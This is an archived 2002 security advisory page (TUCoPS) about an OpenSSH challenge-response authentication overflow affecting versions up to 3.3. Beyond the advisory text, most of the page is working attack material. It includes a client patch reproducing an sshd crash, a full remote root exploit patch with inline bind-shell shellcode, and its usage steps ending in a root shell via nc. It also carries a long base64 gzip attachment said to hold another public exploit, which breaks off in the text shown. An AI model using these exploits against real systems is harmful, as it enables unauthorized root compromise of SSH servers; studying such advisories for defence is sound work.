Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix5482.htm

OpenSSH remote buffer overflow



26th Jun 2002 [SBWID-5482]
COMMAND

	OpenSSH remote buffer overflow

SYSTEMS AFFECTED

	 All versions prior to (and including) 0penSSH 3.3

	

	 OpenSSH before v3.0 are not vulnerable if SKEY and BSD_AUTH options are NOT

	 enabled

	

	 OpenSSH afther (including) v3.0 has BSD_AUTH enabled by default and are therefore 

	 vulnerable

PROBLEM

	Theo de Raadt [deraadt@cvs.openbsd.org] initialy posted a warning  about
	a vulnerability in openSSH.  ISS  [http://www.iss.net]  is  now  posting
	details thanks to Mark Dowd findings :
	

	 http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584

	

	

	A buffer overflow can be  triggered  while  the  user  responds  to  the
	challenge during SKEY/BSD_AUTH style authentification.
	

	

	 Update (27 June 2002)

	 ======

	

	To be more specific, Markus Friedl of OpenBSD adds :
	

	OpenSSH\'s sshd contain an input validation error that can result in  an
	integer overflow and privilege escalation.
	

	All  versions  between  2.3.1   and   3.3   contain   a   bug   in   the
	PAMAuthenticationViaKbdInt code.
	

	All  versions  between  2.9.9   and   3.3   contain   a   bug   in   the
	ChallengeResponseAuthentication code.
	

	OpenSSH 3.4 and later are not affected.
	

	-- See the diff in solutions for details --
	

	

	 Update (28 June 2002)

	 ======

	

	Joe  Testa  of  Rapid7  security   [http://www.rapid7.com]   gives   the
	following DoS code to sshd :
	

	The following are  instructions  on  how  to  reproduce  a  segmentation
	violation in sshd (v3.2.3p1):
	

	    0.)  Compile with PAM and S/KEY support.

	

	    1.)  Apply the following patch to the ssh client:

	

	- --- sshconnect2.c.bak    Thu Jun 27 11:54:54 2002

	+++ sshconnect2.c    Thu Jun 27 11:56:27 2002

	@@ -866,6 +866,7 @@

	     xfree(lang);

	 

	     num_prompts = packet_get_int();

	+    num_prompts = 2;

	     /*

	      * Begin to build info response packet based on prompts requested.

	      * We commit to providing the correct number of responses, so if

	@@ -877,15 +878,16 @@

	 

	     debug2(\"input_userauth_info_req: num_prompts %d\", num_prompts);

	     for (i = 0; i < num_prompts; i++) {

	+      if ( i == 0 ) {

	         prompt = packet_get_string(NULL);

	         echo = packet_get_char();

	 

	         response = read_passphrase(prompt, echo ? RP_ECHO : 0);

	- -

	+      }

	         packet_put_cstring(response);

	- -        memset(response, 0, strlen(response));

	+        /*memset(response, 0, strlen(response));

	         xfree(response);

	- -        xfree(prompt);

	+        xfree(prompt);*/

	     }

	     packet_check_eom(); /* done with parsing incoming message. */

	

	

	    2.)  Add \"PAMAuthenticationViaKbdInt yes\" to \'sshd_config\'.

	

	    3.)  Connect to sshd using the modified client.

	         Note:  valid credentials are not required.

	

	On the server side, you\'ll see:
	

	[root@wonderland hi_chad]# gdb /usr/sbin/sshd

	GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)

	Copyright 2001 Free Software Foundation, Inc.

	GDB is free software, covered by the GNU General Public License, and you are

	welcome to change it and/or distribute copies of it under certain 

	conditions.

	Type \"show copying\" to see the conditions.

	There is absolutely no warranty for GDB.  Type \"show warranty\" for details.

	This GDB was configured as \"i386-redhat-linux\"...

	(no debugging symbols found)...

	(gdb) run -d

	Starting program: /usr/sbin/sshd -d

	debug1: sshd version OpenSSH_3.2.3p1

	debug1: private host key: #0 type 0 RSA1

	debug1: read PEM private key done: type RSA

	debug1: private host key: #1 type 1 RSA

	debug1: read PEM private key done: type DSA

	debug1: private host key: #2 type 2 DSA

	socket: Address family not supported by protocol

	debug1: Bind to port 22 on 0.0.0.0.

	Server listening on 0.0.0.0 port 22.

	Generating 768 bit RSA key.

	RSA key generation complete.

	debug1: Server will not fork when running in debugging mode.

	Connection from 127.0.0.1 port 33208

	debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1

	debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*

	Enabling compatibility mode for protocol 2.0

	debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1

	debug1: list_hostkey_types: ssh-rsa,ssh-dss

	debug1: SSH2_MSG_KEXINIT sent

	debug1: SSH2_MSG_KEXINIT received

	debug1: kex: client->server aes128-cbc hmac-md5 none

	debug1: kex: server->client aes128-cbc hmac-md5 none

	debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received

	debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent

	debug1: dh_gen_key: priv key bits set: 124/256

	debug1: bits set: 1626/3191

	debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT

	debug1: bits set: 1597/3191

	debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent

	debug1: kex_derive_keys

	debug1: newkeys: mode 1

	debug1: SSH2_MSG_NEWKEYS sent

	debug1: waiting for SSH2_MSG_NEWKEYS

	debug1: newkeys: mode 0

	debug1: SSH2_MSG_NEWKEYS received

	debug1: KEX done

	debug1: userauth-request for user jdog service ssh-connection method none

	debug1: attempt 0 failures 0

	debug1: Starting up PAM with username \"jdog\"

	debug1: PAM setting rhost to \"localhost.localdomain\"

	Failed none for jdog from 127.0.0.1 port 33208 ssh2

	debug1: userauth-request for user jdog service ssh-connection method 

	keyboard-interactive

	debug1: attempt 1 failures 1

	debug1: keyboard-interactive devs

	debug1: auth2_challenge: user=jdog devs=

	debug1: kbdint_alloc: devices \'skey\'

	debug1: auth2_challenge_start: trying authentication method \'skey\'

	debug1: got 2 responses

	(no debugging symbols found)...

	Program received signal SIGSEGV, Segmentation fault.

	0x08053822 in strcpy ()

	(gdb)

	

	

	 Update (01 July 2002)

	 ======

	

	Christophe Devine kindly sent us a  remote  exploit  for  OpenBSD  &
	OpenSSH 3.2 :
	

	

	1. Download openssh-3.2.2p1.tar.gz and untar it

	

	~ $ tar -xvzf openssh-3.2.2p1.tar.gz

	

	2. Apply the patch provided below by running:

	

	~/openssh-3.2.2p1 $ patch < path_to_diff_file

	

	3. Compile the patched client

	

	~/openssh-3.2.2p1 $ ./configure && make ssh

	

	4. Run the evil ssh:

	

	~/openssh-3.2.2p1 $ ./ssh root:skey@localhost

	

	5. If the sploit worked, you can connect to port 128 in another terminal:

	

	~ $ nc localhost 128

	uname -a

	OpenBSD nice 3.1 GENERIC#59 i386

	id

	uid=0(root) gid=0(wheel) groups=0(wheel)

	

	--- sshconnect2.c	Sun Mar 31 20:49:39 2002

	+++ evil-sshconnect2.c	Fri Jun 28 19:22:12 2002

	@@ -839,6 +839,56 @@

	 /*

	  * parse INFO_REQUEST, prompt user and send INFO_RESPONSE

	  */

	+

	+int do_syscall( int nb_args, int syscall_num, ... );

	+

	+void shellcode( void )

	+{

	+    int server_sock, client_sock, len;

	+    struct sockaddr_in server_addr;

	+    char rootshell[12], *argv[2], *envp[1];

	+

	+    server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );

	+    server_addr.sin_addr.s_addr = 0;

	+    server_addr.sin_port = 32768;

	+    server_addr.sin_family = AF_INET;

	+    do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr, 16 );

	+    do_syscall( 2, 106, server_sock, 1 );

	+    client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)

	+	&server_addr, &len );

	+    do_syscall( 2, 90, client_sock, 0 );

	+    do_syscall( 2, 90, client_sock, 1 );

	+    do_syscall( 2, 90, client_sock, 2 );

	+    * (int *) ( rootshell + 0 ) = 0x6E69622F;

	+    * (int *) ( rootshell + 4 ) = 0x0068732f;

	+    * (int *) ( rootshell + 8 ) = 0;

	+    argv[0] = rootshell;

	+    argv[1] = 0;

	+    envp[0] = 0;

	+    do_syscall( 3, 59, rootshell, argv, envp );

	+}

	+

	+int do_syscall( int nb_args, int syscall_num, ... )

	+{

	+    int ret;

	+    asm(

	+	\"mov	8(%ebp), %eax; \"

	+	\"add	$3,%eax; \"

	+	\"shl	$2,%eax; \"

	+	\"add	%ebp,%eax; \"

	+	\"mov	8(%ebp), %ecx; \"

	+	\"push_args: \"

	+	\"push	(%eax); \"

	+	\"sub	$4, %eax; \"

	+	\"loop	push_args; \"

	+	\"mov	12(%ebp), %eax; \"

	+	\"push	$0; \"

	+	\"int	$0x80; \"

	+	\"mov	%eax,-4(%ebp)\"

	+    );

	+    return( ret );

	+}

	+

	 void

	 input_userauth_info_req(int type, u_int32_t seq, void *ctxt)

	 {

	@@ -865,7 +915,7 @@

	 	xfree(inst);

	 	xfree(lang);

	 

	-	num_prompts = packet_get_int();

	+	num_prompts = 1073741824 + 1024;

	 	/*

	 	 * Begin to build info response packet based on prompts requested.

	 	 * We commit to providing the correct number of responses, so if

	@@ -874,6 +924,13 @@

	 	 */

	 	packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);

	 	packet_put_int(num_prompts);

	+

	+	for( i = 0; i < 1045; i++ )

	+	    packet_put_cstring( \"xxxxxxxxxx\" );

	+

	+	packet_put_string( shellcode, 2047 );

	+	packet_send();

	+	return;

	 

	 	debug2(\"input_userauth_info_req: num_prompts %d\", num_prompts);

	 	for (i = 0; i < num_prompts; i++) {

	

	

	 Update (02 July 2002)

	 ======

	

	GOBBLES [http://www.immunitysec.com/GOBBLES/] provides a remote  OpenSSH
	exploit for 2.9.9-3.3.
	

	Content-type: application/x-gzip; name=\"sshutup-theo.tar.gz\"

	Content-Transfer-Encoding: base64

	Content-Disposition: attachment; filename=\"sshutup-theo.tar.gz\"

	

	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
